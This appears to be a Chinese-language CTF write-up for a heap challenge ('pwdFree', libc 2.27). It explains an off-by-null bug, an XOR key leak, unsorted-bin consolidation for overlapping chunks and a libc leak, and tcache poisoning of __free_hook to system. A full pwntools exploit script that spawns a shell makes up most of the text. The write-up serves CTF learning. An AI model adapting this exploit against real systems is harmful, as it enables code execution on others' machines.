一个技巧
像遇到这种函数
像遇到这种情况看不了伪代码,我到了0x130A地址,右键创建函数,或者快捷键alt+p
f5就能看它的伪代码了
程序分析
保护全开,版本libc2.27
fgets函数里有个off by null,如果输入的字符串大于size的长度,则会截断并把最后一个赋值为\x00
这里接收pwd后紧接一个异或加密
然后edit只能edit一次0x10长度
利用思路:
首先经过异或泄露异或的key,然后通过off by null改size的use位为0,改prev_size为好几个chunk的合并长度,利用unsortbin的向上合并机制,可以再次申请堆块到一个还在使用的堆中,造成堆块复用,顺便因为main_arena+96地址会下移到另一个还在使用的堆中,泄露出libc。
利用一次edit造成tcache posion指向free_hook,改free_hook为system,在某个堆首地址/bin/sh
exp:
计算基址要分开来写,或者加括号,因为^的优先级小于±
libc_base=uu64(rc(8))^key
libc_base=libc_base-96-0x10-libc.sym[‘__malloc_hook’]
from pwn import *
local_file = './pwdFree'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
elif select == 1:
r = remote('node4.buuoj.cn',25904 )
libc = ELF(remote_libc)
else:
r = gdb.debug(local_file)
libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------------
def add(ID,size,pwd):
sla('Input Your Choice:\n','1')
sa('Input The ID You Want Save:',ID)
sla('Length Of Your Pwd:',str(size))
sa('Your Pwd:',pwd)
def edit(idx,pwd):
sla('Input Your Choice:\n','2')
sl(str(idx))
se(pwd)
def show(idx):
sla('Input Your Choice:\n','3')
sla('Which PwdBox You Want Check:\n',str(idx))
def delete(idx):
sla('Input Your Choice:\n','4')
sla('Idx you want 2 Delete:\n',str(idx))
def exit():
sla('Input Your Choice:\n','5')
#------------------------------------------
add('\x00',0x10,'aaaaaaaa\n')
ru('Use. Save ID:')
key=uu64(rc(0x8))^0x6161616161616161
info('key',key)
for i in range(7):
add('\x00',0xf8,'\n')
add('\x00',0x28,'\n')#8
add('\x00',0xf8,'\n')#9
add('\x00',0x48,'\n')#10
add('\x00',0x48,'\n')#11
add('\x00',0x28,'\n')#12
add('\x00',0xf8,'\n')#13
add('\x00',0x28,p64(0x68732f6e69622f^key)+'\n')#14
for i in range(7):
delete(i+1)
delete(12)
add('\x00',0x28,'a'*0x20+p64(0x1d0^key)+'\n')
delete(9)
delete(13)#unsortbin consolidate
for i in range(7):
add('\x00',0xf8,'\n')
add('\x00',0xf8,'\n')
show(10)
ru('Pwd is: ')
libc_base=uu64(rc(8))^key
libc_base=libc_base-96-0x10-libc.sym['__malloc_hook']
info('libc_base',libc_base)
system=libc.sym['system']+libc_base
free_hook=libc.sym['__free_hook']+libc_base
add('\x00',0x48,'\n')#13
delete(10)
edit(13,p64(free_hook))
add('\x00',0x48,'\n')
add('\x00',0x48,p64(system^key)+'\n')
delete(14)
#debug()
r.interactive()
getshell